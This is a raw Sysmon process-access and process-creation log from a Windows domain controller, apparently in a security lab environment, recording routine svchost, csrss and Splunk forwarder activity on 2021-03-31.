12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6481-6064-5E00-00000000AE01}3304C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-6481-6064-5D00-00000000AE01}37803856C:\Windows\system32\cmd.exe{266CAFBE-6481-6064-5E00-00000000AE01}3304C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.731{266CAFBE-6481-6064-5E00-00000000AE01}3304C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-6481-6064-5D00-00000000AE01}3780C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000002597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.721{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6481-6064-5D00-00000000AE01}3780C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.721{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6481-6064-5D00-00000000AE01}3780C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-647F-6064-4E00-00000000AE01}29042688C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-6481-6064-5D00-00000000AE01}3780C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18319|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.724{266CAFBE-6481-6064-5D00-00000000AE01}3780C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" 
_internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.690{266CAFBE-6481-6064-5C00-00000000AE01}38482544C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.471{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6481-6064-5900-00000000AE01}4012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
